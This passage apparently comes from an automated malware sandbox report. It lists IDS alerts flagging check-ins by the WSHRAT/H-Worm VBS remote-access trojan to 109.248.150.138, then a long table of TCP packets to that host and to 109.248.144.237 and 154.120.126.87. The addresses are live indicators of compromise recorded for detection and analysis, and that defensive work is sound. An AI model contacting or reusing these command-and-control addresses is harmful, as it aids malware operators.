                  192.168.2.5109.248.150.1384979520222017516 10/03/22-15:59:56.411392TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497952022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384976220222017516 10/03/22-15:58:56.662534TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497622022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384972620222017516 10/03/22-15:57:51.886582TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497262022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384980320222017516 10/03/22-16:00:11.895919TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1498032022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384978920222017516 10/03/22-15:59:45.746117TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497892022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384975220222017516 10/03/22-15:58:41.269693TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497522022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384977920222017516 10/03/22-15:59:29.278633TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497792022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384978520222017516 10/03/22-15:59:40.597927TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497852022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384977420222017516 10/03/22-15:59:18.917860TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497742022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384972820222017516 10/03/22-15:57:57.222154TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497282022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384975820222017516 10/03/22-15:58:51.515086TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497582022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384976420222017516 10/03/22-15:59:03.007718TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497642022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384974720222017516 10/03/22-15:58:30.696047TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497472022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384976720222017516 10/03/22-15:59:08.214794TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497672022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384977020222017516 10/03/22-15:59:13.447659TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497702022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384975420222017516 10/03/22-15:58:46.360659TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497542022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384974020222017516 10/03/22-15:58:19.149330TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497402022192.168.2.5109.248.150.138
                  192.168.2.5109.248.150.1384977720222017516 10/03/22-15:59:24.067780TCP2017516ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1497772022192.168.2.5109.248.150.138

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 3, 2022 15:56:26.003720045 CEST497005465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:29.061095953 CEST497005465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:35.251126051 CEST497005465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:44.531790972 CEST497012022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:44.548685074 CEST497025465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:44.566982985 CEST202249701109.248.144.237192.168.2.5
                  Oct 3, 2022 15:56:45.251971006 CEST497012022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:45.287292004 CEST202249701109.248.144.237192.168.2.5
                  Oct 3, 2022 15:56:45.939734936 CEST497012022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:45.975219011 CEST202249701109.248.144.237192.168.2.5
                  Oct 3, 2022 15:56:47.627207041 CEST497025465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:52.067500114 CEST497032022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:52.102797031 CEST202249703109.248.144.237192.168.2.5
                  Oct 3, 2022 15:56:52.627645969 CEST497032022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:52.662770987 CEST202249703109.248.144.237192.168.2.5
                  Oct 3, 2022 15:56:53.315156937 CEST497032022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:53.350512981 CEST202249703109.248.144.237192.168.2.5
                  Oct 3, 2022 15:56:53.627743959 CEST497025465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:53.950350046 CEST497045465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:55.221076012 CEST497055465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:57.128066063 CEST497045465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:58.206263065 CEST497055465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:56:58.477217913 CEST497062022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:58.512871981 CEST202249706109.248.144.237192.168.2.5
                  Oct 3, 2022 15:56:59.018749952 CEST497062022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:59.054753065 CEST202249706109.248.144.237192.168.2.5
                  Oct 3, 2022 15:56:59.565812111 CEST497062022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:56:59.600990057 CEST202249706109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:02.959410906 CEST497075465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:03.128521919 CEST497045465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:04.206908941 CEST497055465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:05.107383966 CEST497082022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:05.143032074 CEST202249708109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:05.644694090 CEST497082022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:05.679691076 CEST202249708109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:05.972479105 CEST497075465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:06.191277027 CEST497082022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:06.227336884 CEST202249708109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:11.353198051 CEST497102022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:11.388391972 CEST202249710109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:11.968043089 CEST497102022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:11.973290920 CEST497075465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:12.003303051 CEST202249710109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:12.660558939 CEST497102022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:12.695801973 CEST202249710109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:12.834825993 CEST497115465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:15.864218950 CEST497115465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:17.828668118 CEST497122022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:17.863908052 CEST202249712109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:18.473731995 CEST497122022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:18.508932114 CEST202249712109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:19.163007021 CEST497122022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:19.198321104 CEST202249712109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:21.880121946 CEST497115465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:22.630538940 CEST497135465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:23.375969887 CEST497145465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:24.343918085 CEST497152022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:24.379266024 CEST202249715109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:24.880682945 CEST497152022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:24.915993929 CEST202249715109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:25.427239895 CEST497152022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:25.463049889 CEST202249715109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:25.692938089 CEST497135465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:26.380443096 CEST497145465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:29.093457937 CEST497165465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:30.603741884 CEST497172022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:30.638906956 CEST202249717109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:31.240489960 CEST497172022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:31.275706053 CEST202249717109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:31.519377947 CEST497185465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:31.729749918 CEST497135465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:31.927829981 CEST497172022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:31.963042974 CEST202249717109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:32.240315914 CEST497165465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:32.427881956 CEST497145465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:34.599940062 CEST497185465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:37.159811020 CEST497192022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:37.195035934 CEST202249719109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:37.803783894 CEST497192022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:37.839227915 CEST202249719109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:38.256445885 CEST497165465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:38.490921974 CEST497192022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:38.525940895 CEST202249719109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:40.600433111 CEST497185465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:41.108023882 CEST497205465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:43.614278078 CEST497212022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:43.649421930 CEST202249721109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:43.784221888 CEST497225465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:44.303917885 CEST497205465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:44.306480885 CEST497212022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:44.341784954 CEST202249721109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:44.991496086 CEST497212022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:45.027692080 CEST202249721109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:46.841146946 CEST497225465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:50.088314056 CEST497232022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:50.123517990 CEST202249723109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:50.304547071 CEST497205465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:50.632560015 CEST497232022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:50.668118000 CEST202249723109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:50.891134024 CEST497245465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:51.179439068 CEST497232022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:51.214639902 CEST202249723109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:51.673548937 CEST497255465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:51.850852966 CEST497262022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:51.879462004 CEST202249726109.248.150.138192.168.2.5
                  Oct 3, 2022 15:57:51.881942034 CEST497262022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:51.886581898 CEST497262022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:51.964802027 CEST202249726109.248.150.138192.168.2.5
                  Oct 3, 2022 15:57:52.119710922 CEST202249726109.248.150.138192.168.2.5
                  Oct 3, 2022 15:57:52.119863033 CEST497262022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:52.120009899 CEST497262022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:52.149907112 CEST202249726109.248.150.138192.168.2.5
                  Oct 3, 2022 15:57:52.851514101 CEST497225465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:53.898443937 CEST497245465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:54.679748058 CEST497255465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:56.280987978 CEST497272022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:56.316153049 CEST202249727109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:56.820616007 CEST497272022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:56.855777979 CEST202249727109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:57.185286045 CEST497282022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:57.214059114 CEST202249728109.248.150.138192.168.2.5
                  Oct 3, 2022 15:57:57.214178085 CEST497282022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:57.222153902 CEST497282022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:57.252393007 CEST202249728109.248.150.138192.168.2.5
                  Oct 3, 2022 15:57:57.252495050 CEST497282022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:57.255089045 CEST497282022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:57:57.283952951 CEST202249728109.248.150.138192.168.2.5
                  Oct 3, 2022 15:57:57.367526054 CEST497272022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:57:57.402889967 CEST202249727109.248.144.237192.168.2.5
                  Oct 3, 2022 15:57:57.701298952 CEST497295465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:59.683634996 CEST497305465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:57:59.914711952 CEST497245465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:00.680212975 CEST497255465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:00.711477995 CEST497295465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:02.534953117 CEST497312022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:02.570090055 CEST202249731109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:02.696063995 CEST497305465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:03.071290970 CEST497312022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:03.106380939 CEST202249731109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:03.257898092 CEST497322022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:03.288501024 CEST202249732109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:03.288686991 CEST497322022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:03.289655924 CEST497322022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:03.341850042 CEST202249732109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:03.342068911 CEST497322022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:03.345979929 CEST497322022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:03.374330997 CEST202249732109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:03.618243933 CEST497312022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:03.653543949 CEST202249731109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:06.758891106 CEST497295465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:08.468487024 CEST497332022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:08.498950005 CEST202249733109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:08.503396034 CEST497332022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:08.503396034 CEST497332022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:08.538362026 CEST202249733109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:08.541455984 CEST497332022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:08.545731068 CEST497332022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:08.574798107 CEST202249733109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:08.696959019 CEST497305465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:08.814769030 CEST497342022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:08.853029966 CEST202249734109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:09.364995003 CEST497355465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:09.368566990 CEST497342022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:09.403857946 CEST202249734109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:09.915386915 CEST497342022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:09.953249931 CEST202249734109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:12.367033958 CEST497355465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:12.773827076 CEST497365465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:13.943264008 CEST497372022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:13.972987890 CEST202249737109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:13.980494022 CEST497372022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:13.983128071 CEST497372022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:14.013128996 CEST202249737109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:14.013420105 CEST497372022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:14.013420105 CEST497372022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:14.042563915 CEST202249737109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:15.154894114 CEST497382022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:15.190080881 CEST202249738109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:15.698925018 CEST497382022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:15.735018969 CEST202249738109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:15.783648968 CEST497365465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:16.238339901 CEST497382022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:16.274296999 CEST202249738109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:18.380238056 CEST497355465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:19.074942112 CEST497395465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:19.116955042 CEST497402022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:19.146075964 CEST202249740109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:19.146255970 CEST497402022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:19.149329901 CEST497402022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:19.179336071 CEST202249740109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:19.179517031 CEST497402022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:19.184978008 CEST497402022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:19.214045048 CEST202249740109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:19.808437109 CEST497415465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:21.354675055 CEST497422022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:21.391171932 CEST202249742109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:21.798741102 CEST497365465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:21.892595053 CEST497422022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:21.927993059 CEST202249742109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:22.064409971 CEST497395465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:22.439430952 CEST497422022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:22.475558996 CEST202249742109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:22.814563990 CEST497415465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:25.480536938 CEST497432022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:25.509264946 CEST202249743109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:25.509404898 CEST497432022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:25.510035038 CEST497432022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:25.541320086 CEST202249743109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:25.541526079 CEST497432022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:25.564502001 CEST497432022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:25.593180895 CEST202249743109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:25.854208946 CEST497445465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:27.664016008 CEST497452022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:27.699450016 CEST202249745109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:27.825298071 CEST497465465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:28.096261978 CEST497395465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:28.205832005 CEST497452022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:28.241126060 CEST202249745109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:28.752434015 CEST497452022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:28.787621975 CEST202249745109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:28.815191984 CEST497415465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:28.846286058 CEST497445465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:30.667259932 CEST497472022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:30.695373058 CEST202249747109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:30.695517063 CEST497472022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:30.696047068 CEST497472022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:30.725656986 CEST202249747109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:30.725837946 CEST497472022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:30.725950003 CEST497472022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:30.754056931 CEST202249747109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:30.830909014 CEST497465465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:33.874365091 CEST497482022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:33.909497976 CEST202249748109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:34.424873114 CEST497482022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:34.460284948 CEST202249748109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:34.862399101 CEST497445465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:34.971796036 CEST497482022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:35.007045031 CEST202249748109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:35.860994101 CEST497492022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:35.889612913 CEST202249749109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:35.891859055 CEST497492022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:35.892450094 CEST497492022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:35.923151016 CEST202249749109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:35.923894882 CEST497492022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:35.924067974 CEST497492022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:35.952301025 CEST202249749109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:36.847091913 CEST497465465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:37.486728907 CEST497505465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:40.114204884 CEST497512022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:40.149295092 CEST202249751109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:40.488055944 CEST497505465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:40.659691095 CEST497512022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:40.695024967 CEST202249751109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:41.205646992 CEST497522022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:41.206615925 CEST497512022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:41.234165907 CEST202249752109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:41.234301090 CEST497522022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:41.241980076 CEST202249751109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:41.269692898 CEST497522022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:41.289587975 CEST497535465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:41.300079107 CEST202249752109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:41.300157070 CEST497522022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:41.302818060 CEST497522022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:41.331073046 CEST202249752109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:44.331892967 CEST497535465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:46.319528103 CEST497542022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:46.322011948 CEST497552022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:46.353328943 CEST202249754109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:46.353468895 CEST497542022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:46.357342005 CEST202249755109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:46.360658884 CEST497542022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:46.391565084 CEST202249754109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:46.391791105 CEST497542022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:46.392034054 CEST497542022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:46.420221090 CEST202249754109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:46.488624096 CEST497505465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:46.863503933 CEST497552022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:46.898838043 CEST202249755109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:47.177925110 CEST497565465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:47.410257101 CEST497552022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:47.446592093 CEST202249755109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:47.911623001 CEST497575465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:50.192050934 CEST497565465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:50.348053932 CEST497535465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:50.911591053 CEST497575465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:51.483974934 CEST497582022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:51.514211893 CEST202249758109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:51.514347076 CEST497582022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:51.515085936 CEST497582022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:51.545428038 CEST202249758109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:51.549211025 CEST497582022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:51.549412966 CEST497582022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:51.577384949 CEST202249758109.248.150.138192.168.2.5
                  Oct 3, 2022 15:58:52.547297001 CEST497592022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:52.582715034 CEST202249759109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:53.082665920 CEST497592022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:53.118024111 CEST202249759109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:53.629548073 CEST497592022192.168.2.5109.248.144.237
                  Oct 3, 2022 15:58:53.665498972 CEST202249759109.248.144.237192.168.2.5
                  Oct 3, 2022 15:58:53.952910900 CEST497605465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:55.916636944 CEST497615465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:56.192270994 CEST497565465192.168.2.5154.120.126.87
                  Oct 3, 2022 15:58:56.632563114 CEST497622022192.168.2.5109.248.150.138
                  Oct 3, 2022 15:58:56.661524057 CEST202249762109.248.150.138192.168.2.5
